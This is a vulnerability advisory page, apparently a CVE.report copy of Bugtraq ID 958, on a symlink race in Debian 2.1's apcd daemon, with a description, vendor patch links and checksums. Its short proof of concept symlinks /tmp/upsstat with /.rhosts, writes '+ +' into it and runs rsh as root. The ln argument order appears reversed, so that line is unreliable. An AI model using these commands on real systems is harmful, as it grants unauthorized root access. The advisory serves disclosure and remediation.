Debian GNU/Linux 2.1 apcd Symlink Vulnerability

BID:958

Info

Debian GNU/Linux 2.1 apcd Symlink Vulnerability

Bugtraq ID: 958
Class: Race Condition Error
CVE:
Remote: No
Local: Yes
Published: Feb 01 2000 12:00AM
Updated: Feb 01 2000 12:00AM
Credit: This vulnerability was disclosed in a Debian Security Advisory on February 1, 2000.
Vulnerable: Debian Linux 2.1
Not Vulnerable:

Discussion

Debian GNU/Linux 2.1 apcd Symlink Vulnerability

A vulnerability exists in the apcd package, as shipped in Debian GNU/Linux 2.1. By sending the apcd process a SIGUSR1, a file will be created in /tmp called upsstat. This file contains information about the status of the APC device. This file is not opened securely, however, and it is possible for an attacker to create a symlink with this name to another place on the file system. This could, in turn, lead to a compromise of the root account.

apcd is used to monitor information from APC uninterruptable power supplies. The ups will inform the apcd that power has been removed, and the apcd will shut down the machine.

Exploit / POC

Debian GNU/Linux 2.1 apcd Symlink Vulnerability

ln -sf /tmp/upsstat /.rhosts
(wait for SIGUSR1 to be sent)
echo + + >> /.rhosts
rsh localhost -l root

Solution / Fix

Debian GNU/Linux 2.1 apcd Symlink Vulnerability

Solution:
If there is no apc attached to the machine, this daemon can safely be stopped, and removed from startup scripts.

The vendor has made patches available for this problem
Source:
http://security.debian.org/dists/stable/updates/source/apcd_0.6a.nr-4slink1.diff.gz
MD5 checksum: 418d34e54e080c2129b8a686e8423d6d
http://security.debian.org/dists/stable/updates/source/apcd_0.6a.nr-4slink1.dsc
MD5 checksum: f9be18f528e8a067696673337e1198ca
http://security.debian.org/dists/stable/updates/source/apcd_0.6a.nr.orig.tar.gz
MD5 checksum: 4a714a8de33cc482b678c0d21b26d76e

Alpha architecture:
http://security.debian.org/dists/stable/updates/binary-alpha/apcd_0.6a.nr-4slink1_alpha.deb
MD5 checksum: 00210d5c30732f2bbaf68291f2d7e8d8

Intel ia32 architecture:
http://security.debian.org/dists/stable/updates/binary-i386/apcd_0.6a.nr-4slink1_i386.deb
MD5 checksum: cff51852635922507c37f96df99d8e76

Motorola 680x0 architecture:
http://security.debian.org/dists/stable/updates/binary-m68k/apcd_0.6a.nr-4slink1_m68k.deb
MD5 checksum: 827079cf5f0819653635873ded1f4a75

Sun Sparc architecture:
http://security.debian.org/dists/stable/updates/binary-sparc/apcd_0.6a.nr-4slink1_sparc.deb
MD5 checksum: d56b7b9ea14c4af81856dd3e1b480e92

These files will be moved into
ftp://ftp.debian.org/debian/dists/stable/*/binary-$arch/ soon.

References

Debian GNU/Linux 2.1 apcd Symlink Vulnerability

References:

© CVE.report 2026

Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. It is the responsibility of user to evaluate the accuracy, completeness or usefulness of any information, opinion, advice or other content. EACH USER WILL BE SOLELY RESPONSIBLE FOR ANY consequences of his or her direct or indirect use of this web site. ALL WARRANTIES OF ANY KIND ARE EXPRESSLY DISCLAIMED. This site will NOT BE LIABLE FOR ANY DIRECT, INDIRECT or any other kind of loss.

CVE, CWE, and OVAL are registred trademarks of The MITRE Corporation and the authoritative source of CVE content is MITRE's CVE web site. This site includes MITRE data granted under the following license.

Free CVE JSON API cve.report/api

CVE.report and Source URL Uptime Status status.cve.report